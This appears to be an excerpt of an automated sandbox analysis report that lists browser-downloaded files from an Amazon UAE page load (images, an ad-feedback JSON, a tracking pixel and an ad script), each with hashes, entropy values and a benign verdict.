                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.."2AQa.q...#Rrs....3BCDdt....4...&5Sb.......%T................................................!1.Aq..3Q..#Ra"......$2Bb..............?..*P.w..1...iM.0.mk..H.#n.7....r......?...4..][>.s.$2...=...@.....R.Z3.6|.b.3Q...`.twX..{.i..........I.iP..XG....x..zn....x....=3..Y..M.J.".R..}.^K.D.P0t......U.o..R............W.......U........u..3..7u........qM.J.{dV..3...WT `.*..1..........^.(}....V..n....S...q.M......T.]..QA.......i.Rv...SmF8.{..i...;4.,qG..^G`...T.c.P...>..pB.K.bu|M.....vWk.#.>2..........).q.6Vq$.I<!.%V.....*...[.q.*/U..r>m..(...(.......`...}.u...}.Z..}-...T.7..$._.i6s.....Q.}......,.~oAX.7..J?R7....2hm..\T]?Fh..l.3o.....$..d....J3a..Z..+...n.{~.a[....v.#.........."}.+FO.:m.[.U..........Bh..D....x....Of......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5643
                                                                                                                                                                                                                                                                      Entropy (8bit):7.864358643933752
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                                                                                      MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                                                                                      SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                                                                                      SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                                                                                      SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334873_186x116_1X_en_AE_2._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4884
                                                                                                                                                                                                                                                                      Entropy (8bit):5.093952525214843
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNQzriJcrRR9EbtGeSDOMLIpKU2y0uqYT40STfKAHSTfXAp4LFrapU:IYzrIctR9Ef+VLIpKnyA04fKAAXAp4LR
                                                                                                                                                                                                                                                                      MD5:68A758FD511C551671582EE114290562
                                                                                                                                                                                                                                                                      SHA1:9BBF6966A7EF9AF727B2279FABF01A8A11D5F740
                                                                                                                                                                                                                                                                      SHA-256:39533FCC9F5D252D34013DAF823A6B2F2520B01FBFF87A26D952C9F670AC6361
                                                                                                                                                                                                                                                                      SHA-512:6EC9E5ED63AFD0E16DDCE4201E629597C94B0552B7804EC0CA0E016A48B563316A492DF686B944BA29978AF5335B7BCD58B490377AB4939E8ADEA8BECD657A61
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-desktop-ad-center-1&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; to
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                                                                                                                      Entropy (8bit):7.708118239255408
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R9OEXNkccDp0ks1wetNPNGCn+JLySBRbTbriM8hPMm/Laqjy:rQDvABtNFc3TbrUhPxWqW
                                                                                                                                                                                                                                                                      MD5:17CCA7168F2A2CD730390E9BE166250A
                                                                                                                                                                                                                                                                      SHA1:AA654D6E37A7D776DB85093F7EC4845B6DE1C7BB
                                                                                                                                                                                                                                                                      SHA-256:3C90972F1C2C388F93EAD7D80A517F9C87DF00692ABC29CCE7AF62880AEABE3A
                                                                                                                                                                                                                                                                      SHA-512:01C23E69EF968D67F20B25C90DF8F7C7317AC2A444E1863EA9ECA81238A8911FE1BD1041E2D8BF10854DD8AC9B29DBA054E69E592C334D29804A324DEE250BC4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265638478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C265637478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="CE6620C76A0D1BC9846AF38E4B94797E" stRef:documentID="CE6620C76A0D1BC9846AF38E4B94797E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d.......................4................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3773
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8580841128368695
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:aHHwIHbIfSQ/iCzxqw+4fLVBggTFoc1SHHklIFN+k:s7E/VzEyuPcgklI79
                                                                                                                                                                                                                                                                      MD5:AECFD0EAFC60CCA7E0CE9706F5A567B2
                                                                                                                                                                                                                                                                      SHA1:0023340DBEA1F5B5510BB37F1A08CC9AE5AD3469
                                                                                                                                                                                                                                                                      SHA-256:46FA74ABB04D54AA2CBDE8E305C1155303F3135A5AE018140A4D150D41E6F788
                                                                                                                                                                                                                                                                      SHA-512:ADD6B649580963B8FA776BC1F8415A75AC86A8A64B822C080C65E455F0524A136EC2106DC56412E5DCF24670DDB147B2BDE4FC45D72752D6F3EFA34B5D0E6311
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Sports_EN_1x._SY116_CB567104843_.jpg
                                                                                                                                                                                                                                                                      Preview:........................................................#"""#''''''''''..................................................!! !!''''''''''..........Adobe.d...........t...."........................................................................................!."1.AQaq.2B.#4brt56Rs......$%3...........................!..1AQ."2aq.......#BRr.34...............?..Q.t.$...DD....D@...DD....D@...DD......Q.t.$...DD.V.,..4..\..W.z..#.....3.EYJ...../....X. }...?..?.,h...{.l..ggz^.Sc{][..g.o...2O3.............t.c].{..Y`2..W;.9o"......{.|h...I.....,na..<9.s.{...=.R...4*..c.......QjV...pQr.k.K1..p.R;\..)m.Jf._lGb8X.2..s....d|...~..+.......C=.:WY.....{....-...IU..kF..8.~.....Yw.5...~.....`.x&)..n><\..%.w.--.J...ni...SR..[p....5.$q.........#..c..7...v....l.....K...78.}...U.....M.6a=sb...9."V.a..j2Z.7...u#.>W....0.&.......>..M^...d...R...+.f.x<_.Y.w...h....N.!.P..3>.^X9.`.*.$m.s.].I=.[."...^..L.....$..:n......z:.uG..}wG..k.....;./w..xU.i...vZ...m?..F.H8....r.>.JRm,e.'B.#Rv.Q..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24182
                                                                                                                                                                                                                                                                      Entropy (8bit):5.315032386425423
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                                                                                      MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                                                                                      SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                                                                                      SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                                                                                      SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3783
                                                                                                                                                                                                                                                                      Entropy (8bit):7.892597719362774
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TgfIdu08P9yj70Rp8i+jxwJTDAJbeXaLrkerYVtI3DJURa:xdg8jq+t2X6b5rYVtsJURa
                                                                                                                                                                                                                                                                      MD5:479684630CACC4A318DB9991B11BE386
                                                                                                                                                                                                                                                                      SHA1:8A290D73EEBB2164B6CCDA03A05CE5F218AE8172
                                                                                                                                                                                                                                                                      SHA-256:537C0F8FFE5BB82F4F291B491DC57C5316EAD76088AC3DEF116B08957BF763E3
                                                                                                                                                                                                                                                                      SHA-512:702287AECFEEA7DB21AC5C6079C047D1AFB6F8FE6B5FC1BFBDE9E2296581B5CB8097C4D458FCDF9CC71DF2D27F3411819DE518D7C69C4794E6FC1D526B8CFA1F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1.2Qa"Aq.....Br..RSb...#3CDT.....Uc.....................................................!."A1.............?..-z....b..I.......j.$U..q..{..,.$.n.....U......z.@.#....*.....iy...."7pyS.uV.jn.^E-..p>F.Z#]B./...rv....Z...{....F..|G....*fF>5.6......r b...N...>..?..%*.EG...d..&A...i.g.....4$......I.......u_.....h*..W........u..j....b....H.j<.@.G*..E...)....~.u_Q..j..q....5....].W_.#/..;.$..fo....W._G!..P...X.>..I..7...r......-.x>..p*1.P..*...V......Sy....u......K.......^.......E.t......u.k.kz].....M..+..H.g.H.!..k.......!....].u.=............N...o..*.Tm.p).d...Ed$.....*...X'.....CR.98F+.$.}../;..v._%4.J.eP..%.....s..3.k=GJ...3'.;...Gj....[..n.{B..p@.Z............R.)....*.P.?..q.D%.z...R>.n{...Fd.....U.b.".8.N.@.S.v.E..B.b.x.>x.&.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7990
                                                                                                                                                                                                                                                                      Entropy (8bit):7.706558021733819
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TMPkHwWgQW8H0/umNW007igeqPzsUDZk2wrTjzEpcgjzOa6ByqDQE+mTveMR40iS:IkHSQW8Uzd0tPzsyk2GjzE1mdv5Tvr4q
                                                                                                                                                                                                                                                                      MD5:6A91877AC452B3712466BAE3DD301DF4
                                                                                                                                                                                                                                                                      SHA1:EAF519CF4BB9DB2718CACE022CA447D74BE3C244
                                                                                                                                                                                                                                                                      SHA-256:13447E172D3E0135D5A9A871091F1ECF2BEC16C4FD3721FCEBD42D4D2A879B9D
                                                                                                                                                                                                                                                                      SHA-512:8B9B4F66E91E24B022DC4625A111E89DBE30DFF47A953B76DD2C89D67497ABFAE6964B499A85DFE0CBC7709870F3FF95084A27FF157D90C397DC5BB473D8117A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................................................................................................................................................&.]..&.._4...B@...................F..o..!.e;5c.2.`.rrv.<df)*+.o..L..................4..[5.b*..U.....Z...c6.,h.RT.ea.=}.2..y!pX....................../.(.9....1/q..r...#...-.(Jm.vR.a~.,.................q.R...V...Q...W...N\..S?....MMv..7...@..................Ee.{..C*.Z."p......[mx4n;..~..ku..................2.`...=.r..j.7..2..^..-.=/.X,.[l....(....Z|`3.t.H..............c.g.[....:.cY.V.u.k.....h.T.....l..l..q....xv_.+Vd.t...............G>J|[.W...c..S..[....8=....s.SV>...O...3......bd.....O.. ..... M.c..._.. .................._e&..9..n...=|........Nn..>_......o,`.....?.<i.-u..w.>........}gy.. .
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 88x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7284
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950745941867645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TCxupXbfIYU9zr46OrLedCpo0OO+2k7QK2tcZylct+2U8pZ/PKripocgXjuVuomV:GQ/ZHeO+2k7QrtcK4pzSujmhvb
                                                                                                                                                                                                                                                                      MD5:46624F9C9A277EAAA1326B699555EA5B
                                                                                                                                                                                                                                                                      SHA1:938163966F5BEF2851198A48FD353D99BFC71CAD
                                                                                                                                                                                                                                                                      SHA-256:188E173F77E998734D1DD98261914A86BB0CD990206156B55896A9C2CA9193B5
                                                                                                                                                                                                                                                                      SHA-512:AF01E8AB6A9F2EAFEEFF81633F452BE3D2070EBE2B44E9D758BB4C73648ED82A47971CFDFD1819FB521E779D9D40C87E1B8A2381BCCBCD037D00E10C6368B627
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.X.."..............................................................!1.."A.2Qqs..#ar..34c..%BRT....$CSd.......DUb....................................................1!..4Aaq....#2Q..."$3BR.Cr...............?.....I.8X.>..&..S....-..h..*$.......;P.t.@.._......7.X..cZ...m~&`gY.|9..Z.2I>....&.?......hd....u..A.58..J... ........w>f..W.T...?.e..........?.e......#L.j.m_.a.]o.|.x......].i...!m.-W.Q...;~d..)..Qzua..3;....|..v.\.......CF......b.{$.a.......[e>..Q.o.S..1.b..3.{...U......7.......U.?].>.?3.K..l:T}..b...Z..gk.4.H......K/..[...F......6C.....)wL.P.mG....A[.i..D.H.....z#u........#ly...Z....a.VR..{.\U..{...K.......jU......O..........yWA...n.6..R..\.g...q.j?.....Oud.G...|.>.t()...8...+.LU...X...>...LXBb)...C.?.>*#......>.^E^..q..ia...{T.0..J.......a...z...S..*.4.e...m....\.i]A.........W/...Z.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x314, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):27388
                                                                                                                                                                                                                                                                      Entropy (8bit):7.98204197035148
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:0kytyE8/VdGy1Ui8Qw1CEnvMPFqq44eGswGFXj:0kqyiy1N98CEnvdqNswGh
                                                                                                                                                                                                                                                                      MD5:33F1F49A4900B9DAAB6D5C86E62C7F46
                                                                                                                                                                                                                                                                      SHA1:9925F84B49F7FDF1C15AA4B26633D47EC0B57E4C
                                                                                                                                                                                                                                                                      SHA-256:9313C641376E0DFBEBD55D0DCF9E7A2AAC8B484F27393BA04485756550F5D525
                                                                                                                                                                                                                                                                      SHA-512:3A3D88053CFA58C9A810ABC905858F0BC13D66B0B1BD60FC388F46E7792F5E2791ADD197BDE16FB43762645BF857B4D6212AF4FF8B7F00FC958F8778DD5837E6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/717u+E-LU6L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......:.@.."..........6...................................................................iE%%.-.N|....,9.).#.S?b{....g...V.}_R\I$.I$.I$.I*.e..a..._6>0...Z.Ws.$.J..Y.L.J:F5...:>.l^B...K.j.}rE..{.W...*m....\.9._..%F._.A..(4.5A.^B..9..Sb'..8C.=C}...i.a~..f.I*.52.4...>^._TW..\..+..0.....n.2.X)usW{..f[j5...4..v.,l.....q.^=.2..Cs...<...).}..'d..ZF.C.Z~.D....0...%...I!.....u._.te.C.@c.\N.?......T....."..y......6..jt.....^b.3..W.F.....|..!.y..b,9._.^.t(.V.b.8.cs7..I$.b.PCB..Ob...6e,~..KQn.-...x....h<.C.u.l+<......6..s5.b}0[..Zw.....A.......O.s...e...w.\.R......5m......E..M.Yj.hyv.t..z.9lP.RH..5%.d....~dL7^+...*I.|a..... d.A3X..'.q...7.5...#$...M..Z:....a..]Q.!.rUIfG.Y.#.e^.T........n....86.?M...).I*v...>V)...75h.Q....z....(c..:NV.h.......yl..^c.=...[l&1GQ.0.....y...v...|.'..{..@1..a2....Oui.)&...y..X....U.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23432
                                                                                                                                                                                                                                                                      Entropy (8bit):7.97117450100272
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:m+hzqXOIitBUo2Ei89qg5KmbNMGVry3BPrbgnuMF5NCpJ2UWDJKdp8BVhKe+Zg:mUz6eteob9q2kRPrbGjLNSWQp8BVKZg
                                                                                                                                                                                                                                                                      MD5:3CF33140522F529A45072B0C818CDA45
                                                                                                                                                                                                                                                                      SHA1:4603B020990D7794F41DEC762E190B09A486D0CC
                                                                                                                                                                                                                                                                      SHA-256:586C6C5C0A795D754A85A32EBDD2ED26D930CE29CEE493C42AB9952D5829B4C3
                                                                                                                                                                                                                                                                      SHA-512:06EBCCA494233E53D2C5C2F4198299448C4A3B0DD0FFFDA90BAE3EA14F373D4C94B80FF3571BE0DCA27222DA355EE6D36477F4F2E290D28104931FFFF5027E77
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/718HNI21EeL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........6...........................................................................A,/.(....f&.W7..0in.....................>C.y..$C;.Sg......p.,..1'U.Q.+d..v..+.6..mvYU....-....................L...=..@r/Z......Q.,.....sQ...-..2.[k?s.(..NlQ.zK:.....e|..>./.................e.,........o-.P..\V..z....s.o.^s..u..IQg..V.H.C.z.....+-.x..1...nZ..-.v*...0gk................*?.H.u..=..\.l..<..l.Zii{..Ah.W..xu..N.$.....o..t.p.o._z.z.)j]]....j&..........:...d^0.Vj...B/&,S.\.-.kW+.S:...%.U..c.7..Ed...v.....+^N.VgX...,..Q.{.:.._M...]........jU.d..,..m...J.X...Y.K..'.l=L.~z...d|.f.AA2..e^.?~:...+t.n._Cj.5.bW .u3.zt?H>}...4s.E.......D.L..U..1..La.n(.VI..y.......U>.0.%u'...6oeT{.3..)....,.....)M.>.c<.7......,9.<.'..}...[..h).m.R.......@.........%s.....>..~..O2...6\6...x..X........v-.V.'jf..<_...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3683
                                                                                                                                                                                                                                                                      Entropy (8bit):7.885143961741562
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Tu95NlWq9w4RbZluU6BUlTpUIFSK+6vzja:C95NIq9wOUU6OlXx+szW
                                                                                                                                                                                                                                                                      MD5:5D696105C36B598568169C5C4B725C64
                                                                                                                                                                                                                                                                      SHA1:0C7129A666167A62B944445F5C702952353A9303
                                                                                                                                                                                                                                                                      SHA-256:241AF2152C537513CB097AA493D36E1D764011E35C28C5D35FA15B1B7530A7C2
                                                                                                                                                                                                                                                                      SHA-512:0EE2CEAF6A6F5C79729A115F9F8D44FB6C4D7E8FBAD5407B109F6FED1E3FBCEBADB8EA3F63781AF71EAD3D788200DB9DB961A9F33938C6DF54550E8CA44A9841
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg
